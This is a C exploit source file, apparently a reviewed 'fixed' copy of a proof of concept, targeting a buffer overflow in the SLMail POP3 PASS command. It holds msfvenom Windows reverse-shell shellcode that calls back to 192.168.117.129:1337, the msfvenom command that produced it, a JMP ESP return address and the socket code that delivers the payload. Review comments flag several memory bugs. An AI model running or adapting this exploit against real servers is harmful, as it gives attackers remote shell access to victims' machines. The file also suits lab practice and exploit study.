643-fixed.c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
//#define retadd "\x8f\x35\x4a\x5f" /*JMP ESP in SLMFC.DLL 0x5f4a358f*/
#define retadd "\x8f\x35\x4a\x5f"
#define port 110
/* msfvenom --arch x86 -p windows/shell_reverse_tcp LHOST=192.168.117.129 R LPORT=1337 -b '\x00\x0a\x0d' -f c */
//unsigned char shellcode[] =
/* Raw payload bytes as emitted by the msfvenom command quoted above (-f c output,
 * 15 bytes per line, 6 on the last).  The array is declared unsigned char but is
 * handed to strcat()/strlen() in main(), which treat it as a NUL-terminated C
 * string; the '\x00' entry in the -b exclusion list is what makes that usable. */
unsigned char shellcode[] =
"\xbb\xc8\x2e\xb1\xfa\xdb\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x5a\x12\x83\xc2\x04\x03\x92\x20\x53\x0f\xde\xd5\x11"
"\xf0\x1e\x26\x76\x78\xfb\x17\xb6\x1e\x88\x08\x06\x54\xdc\xa4"
"\xed\x38\xf4\x3f\x83\x94\xfb\x88\x2e\xc3\x32\x08\x02\x37\x55"
"\x8a\x59\x64\xb5\xb3\x91\x79\xb4\xf4\xcc\x70\xe4\xad\x9b\x27"
"\x18\xd9\xd6\xfb\x93\x91\xf7\x7b\x40\x61\xf9\xaa\xd7\xf9\xa0"
"\x6c\xd6\x2e\xd9\x24\xc0\x33\xe4\xff\x7b\x87\x92\x01\xad\xd9"
"\x5b\xad\x90\xd5\xa9\xaf\xd5\xd2\x51\xda\x2f\x21\xef\xdd\xf4"
"\x5b\x2b\x6b\xee\xfc\xb8\xcb\xca\xfd\x6d\x8d\x99\xf2\xda\xd9"
"\xc5\x16\xdc\x0e\x7e\x22\x55\xb1\x50\xa2\x2d\x96\x74\xee\xf6"
"\xb7\x2d\x4a\x58\xc7\x2d\x35\x05\x6d\x26\xd8\x52\x1c\x65\xb5"
"\x97\x2d\x95\x45\xb0\x26\xe6\x77\x1f\x9d\x60\x34\xe8\x3b\x77"
"\x3b\xc3\xfc\xe7\xc2\xec\xfc\x2e\x01\xb8\xac\x58\xa0\xc1\x26"
"\x98\x4d\x14\xe8\xc8\xe1\xc7\x49\xb8\x41\xb8\x21\xd2\x4d\xe7"
"\x52\xdd\x87\x80\xf9\x24\x40\x6f\x55\x53\x11\x07\xa4\x9b\x14"
"\xe1\x21\x7d\x7c\x01\x64\xd6\xe9\xb8\x2d\xac\x88\x45\xf8\xc9"
"\x8b\xce\x0f\x2e\x45\x27\x65\x3c\x32\xc7\x30\x1e\x95\xd8\xee"
"\x36\x79\x4a\x75\xc6\xf4\x77\x22\x91\x51\x49\x3b\x77\x4c\xf0"
"\x95\x65\x8d\x64\xdd\x2d\x4a\x55\xe0\xac\x1f\xe1\xc6\xbe\xd9"
"\xea\x42\xea\xb5\xbc\x1c\x44\x70\x17\xef\x3e\x2a\xc4\xb9\xd6"
"\xab\x26\x7a\xa0\xb3\x62\x0c\x4c\x05\xdb\x49\x73\xaa\x8b\x5d"
"\x0c\xd6\x2b\xa1\xc7\x52\x5b\xe8\x45\xf2\xf4\xb5\x1c\x46\x99"
"\x45\xcb\x85\xa4\xc5\xf9\x75\x53\xd5\x88\x70\x1f\x51\x61\x09"
"\x30\x34\x85\xbe\x31\x1d";
/* `plm` is the peer address filled in by conn(); `lar` and `target` are declared
 * but never referenced anywhere in this file. */
struct sockaddr_in plm,lar,target;
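/*
 * Open a TCP connection to `ip` on the fixed port given by the `port` macro
 * and return the connected socket descriptor.  The peer address is kept in
 * the file-scope `plm` struct.  Every failure is fatal: the cause is
 * reported on stderr and the process exits with a non-zero status, so a
 * caller can rely on the returned descriptor being valid.  (The original
 * exited with status 0 on error and passed an unchecked socket() result on
 * to connect().)
 */
int conn(char *ip)
{
    int sockfd;

    /* Zero the whole struct (covers sin_zero) rather than bzero() one field. */
    memset(&plm, 0, sizeof plm);
    plm.sin_family = AF_INET;
    plm.sin_port = htons(port);
    plm.sin_addr.s_addr = inet_addr(ip);
    /* inet_addr() signals a malformed dotted-quad with INADDR_NONE. */
    if (plm.sin_addr.s_addr == INADDR_NONE)
    {
        fprintf(stderr, "[-] invalid address: %s\n", ip);
        exit(EXIT_FAILURE);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
    {
        perror("[-] socket error!");
        exit(EXIT_FAILURE);
    }

    if (connect(sockfd, (struct sockaddr *)&plm, sizeof plm) < 0)
    {
        perror("[-] connect error!");
        close(sockfd);
        exit(EXIT_FAILURE);
    }

    printf("[*] Connected to: %s.\n", ip);
    return sockfd;
}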
/*
 * Entry point.  Assembles the single oversized POP3 PASS argument this
 * proof-of-concept sends (filler, 4-byte return-address overwrite, NOP slide,
 * payload), connects to the hard-coded address, replays a USER/PASS exchange
 * and exits.  argc/argv are ignored; the target is fixed in the conn() call.
 *
 * NOTE(review): none of the malloc() results are checked, and several
 * buffers below are used as C strings without a NUL terminator (UB); see
 * the per-line notes.
 */
int main(int argc, char *argv[])
{
int xs;
/* Server replies land here; never NUL-terminated before the "%s" printfs below. */
char out[1024];
char *buffer = malloc(3500);
memset(buffer, 0x00, 3500);
char *off = malloc(2606);
memset(off, 0x00, 2606);
// memset(off, 0x41, 2605);
/* NOTE(review): filling all 2606 bytes leaves `off` with no terminator, so the
 * strcat(buffer, off) below reads past the end of the allocation until it happens
 * to meet a zero byte (UB).  The commented-out 2605-byte variant kept the last
 * byte zero. */
memset(off, 0x41, 2606);
// char *nop = malloc(16);
// memset(nop, 0x00, 13);
// memset(nop, 0x90, 12);
char *nop = malloc(8);
memset(nop, 0x00,8);
/* NOTE(review): same problem as `off`: all 8 bytes are 0x90, so `nop` is not a C string. */
memset(nop, 0x90,8);
/* Layout: 2606 filler bytes + 4-byte retadd + 8 NOPs + 351-byte payload = 2969 bytes,
 * which fits in the 3500-byte `buffer`.  strcat() relies on each piece being a
 * terminated string with no embedded zero; the payload satisfies that because the
 * msfvenom -b list above excludes \x00, `off` and `nop` do not (see notes). */
strcat(buffer, off);
strcat(buffer, retadd);
strcat(buffer, nop);
/* unsigned char[] passed where char * is expected (pointer-sign mismatch warning). */
strcat(buffer, shellcode);
printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by TJnull.\n");
xs = conn("192.168.117.132");
/* NOTE(review): read() result ignored and `out` not terminated; printf("%s") can
 * run into uninitialised stack on a short, full (1024-byte) or failed read. */
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"USER username\r\n", 15);
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"PASS ",5);
write(xs,buffer,strlen(buffer));
/* %d with a size_t argument is UB; %zu is the matching conversion. */
printf("Shellcode len: %d bytes\n",strlen(shellcode));
printf("Buffer len: %d bytes\n",strlen(buffer));
/* NOTE(review): "\r\n" occupies 3 bytes including its terminator; a length of 4
 * reads one byte past the literal.  The intended count is 2. */
write(xs,"\r\n",4);
close(xs);
}